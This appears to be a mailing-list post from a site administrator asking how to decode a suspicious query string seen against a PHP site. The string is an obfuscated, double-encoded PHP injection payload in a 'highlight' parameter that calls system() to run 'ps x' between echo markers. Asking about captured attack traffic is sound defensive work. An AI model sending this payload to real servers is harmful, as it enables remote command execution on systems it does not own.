One of the sites I manage has had what appears to be some kind of attempt to break in by appending the following to some php related url.

&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr (111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)% 252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr (95)%252echr(95)%252echr(95)%252echr(59)%252echr(112)%252echr(115)% 252echr(32)%252echr(120)%252echr(59)%252echr(101)%252echr(99)%252echr (104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)% 252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr (95)%252echr(59))%252e%2527

How can I decode this to find out what it is?

-- Dale



Attachment: PGP.sig
Description: This is a digitally signed message part

Reply via email to